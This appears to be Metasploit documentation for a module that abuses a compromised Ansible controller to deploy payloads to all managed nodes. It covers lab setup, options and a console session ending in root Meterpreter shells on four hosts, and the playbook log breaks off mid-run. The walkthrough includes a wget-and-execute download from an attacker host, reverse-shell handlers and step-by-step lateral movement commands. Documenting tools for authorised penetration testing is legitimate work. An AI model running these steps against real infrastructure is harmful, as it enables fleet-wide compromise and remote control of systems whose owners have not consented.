Vulnerable Application
This exploit module creates an ansible module for deployment to nodes in the network. It creates a new yaml playbook which copies our payload, chmods it, then runs it on all targets which have been selected (default all).
Docker-compose Install
Use the ansible lab files located here.
Before bringing up the docker-compose instance, you'll want to generate an SSH key: ssh-keygen -t rsa -N "" -f secrets/id_rsa
Of note, only 1 of the 3 alpine hosts will be successful due to the port conflict. This is fine though.
Verification Steps
Install the application
Start msfconsole
Get an initial shell on the box
Do: use exploit/linux/local/ansible_node_deployer
Do: set session [#]
Do: run
You should get sessions on all the targeted hosts
Options
ANSIBLEPLAYBOOK
Location of ansible executable if not in a standard location. This is added to a list of default locations which includes /usr/local/bin/ansible. Defaults to ``
WritableDir
A directory on the compromised host we can write our payload to. Defaults to /tmp
TargetWritableDir
A directory on the target hosts we can write our payload to. Defaults to /tmp
CALCULATE
This will calculate how many hosts may be exploitable by using Ansible's ping command.
HOSTS
Which Ansible host (groups) to target. Defaults to all
ListenerTimeout
How many seconds to wait after executing the payload for hosts to call back. If set to 0, wait forever. Defaults to 60
Scenarios
Docker compose as mentioned above
Get initial access to the system
resource (ansible_deploy.rb)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (ansible_deploy.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (ansible_deploy.rb)> set srvport 8181
srvport => 8181
resource (ansible_deploy.rb)> set target 7
target => 7
resource (ansible_deploy.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (ansible_deploy.rb)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1:8181/2BQIMgeywC6gGt9
[*] Server started.
[*] Run the following command on the target machine:
wget -qO OHZQobFE --no-check-certificate http://1.1.1.1:8181/2BQIMgeywC6gGt9; chmod +x OHZQobFE; ./OHZQobFE& disown
[*] 172.22.0.7 web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 172.22.0.7
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.22.0.7:49612) at 2023-12-15 20:12:27 -0500
resource (ansible_deploy.rb)> use exploit/linux/local/ansible_node_deployer
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
resource (ansible_deploy.rb)> set session 1
session => 1
resource (ansible_deploy.rb)> set verbose true
verbose => true
resource (ansible_deploy.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (ansible_deploy.rb)> set lport 9999
lport => 9999
[*] Starting persistent handler(s)...
[msf](Jobs:1 Agents:0) exploit(linux/local/ansible_node_deployer) >
[msf](Jobs:1 Agents:1) exploit(linux/local/ansible_node_deployer) > set TargetWritableDir /etc/
TargetWritableDir => /etc/
[msf](Jobs:1 Agents:1) exploit(linux/local/ansible_node_deployer) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/local/ansible_node_deployer) >
[*] Started reverse TCP handler on 1.1.1.1:9999
[*] Running automatic check ("set AutoCheck false" to disable)
[+] /tmp is writable, and ansible executable found
[+] The target is vulnerable.
[+] Stored pings to: /root/.msf4/loot/20231215201340_default_172.22.0.7_ansible.ping_422232.txt
Host Status Ping Changed
---- ------ ---- -------
alpine-example-com SUCCESS pong false
alpinesystemd-example-com SUCCESS pong false
centos7-example-com SUCCESS pong false
rhel8-example-com SUCCESS pong false
[+] 4 ansible hosts were pingable, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.
[*] Creating yaml job to execute
[*] Writing payload
[*] Writing '/tmp/O514h2N' (250 bytes) ...
[*] Executing ansible job
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.22.0.6
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.22.0.4
[+] Stored run logs to: /root/.msf4/loot/20231215201411_default_172.22.0.7_ansible.playbook_967421.txt
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.22.0.5
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.22.0.2
[*] Meterpreter session 2 opened (1.1.1.1:9999 -> 172.22.0.6:60850) at 2023-12-15 20:14:36 -0500
[*] Meterpreter session 5 opened (1.1.1.1:9999 -> 172.22.0.2:34980) at 2023-12-15 20:14:36 -0500
[*] Meterpreter session 3 opened (1.1.1.1:9999 -> 172.22.0.4:51082) at 2023-12-15 20:14:46 -0500
[*] Meterpreter session 4 opened (1.1.1.1:9999 -> 172.22.0.5:41770) at 2023-12-15 20:14:56 -0500
[msf](Jobs:2 Agents:5) exploit(linux/local/ansible_node_deployer) > sessions -l
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux root @ 172.22.0.7 1.1.1.1:4444 -> 172.22.0.7:49612 (172.22.0.7)
2 meterpreter x64/linux root @ 172.22.0.6 1.1.1.1:9999 -> 172.22.0.6:60850 (172.22.0.6)
3 meterpreter x64/linux root @ 172.22.0.4 1.1.1.1:9999 -> 172.22.0.4:51082 (172.22.0.4)
4 meterpreter x64/linux root @ 172.22.0.5 1.1.1.1:9999 -> 172.22.0.5:41770 (172.22.0.5)
5 meterpreter x64/linux root @ 172.22.0.2 1.1.1.1:9999 -> 172.22.0.2:34980 (172.22.0.7)
āā$ cat ~/.msf4/loot/20231215201411_default_172.22.0.7_ansible.playbook_967421.txt
PLAY [Deliver Meterpreter] *****************************************************
TASK [Gathering Facts] *********************************************************
[DEPRECATION WARNING]: Distribution redhat 8.2 on host rhel8-example-com should
use /usr/libexec/platform-python, but is using /usr/bin/python for backward
compatibility with prior Ansible releases. A future Ansible release will
default to using the discovered platform python for this host. See https://docs
.ansible.com/ansible/2.9/reference_appendices/interpreter_discovery.html for
more information. This feature will be removed in version 2.12. Deprecation
warnings can be disabled by setting deprecation_warnings=False in ansible.cfg.
ok: [rhel8-example-com]
ok: [centos7-example-com]
[WARNING]: Platform linux on host alpine-example-com is using the discovered
Python interpreter at /usr/bin/python, but future installation of another
Python interpreter could change this. See https://docs.ansible.com/ansible/2.9/
reference_appendices/interpreter_discovery.html for more information.
ok: [alpine-example-com]
[WARNING]: Platform linux on host alpinesystemd-example-com is using the
discovered Python interpreter at /usr/bin/python, but future installation of
another Python interpreter could change this. See https://docs.ansible.com/ansi
ble/2.9/reference_appendices/interpreter_discovery.html for more information.
ok: [alpinesystemd-example-com]
TASK [ansible.builtin.copy] ****************************************************
changed: [alpine-example-com]
changed: [centos7-example-com]
changed: [rhel8-example-com]
changed: [alpinesystemd-example-com]
TASK [ansible.builtin.file] ****************************************************
changed: [alpine-example-com]
changed: [rhel8-example-com]
changed: [centos7-example-com]
changed: [alpinesystemd-example-com]
TASK [command] *****************************************************************
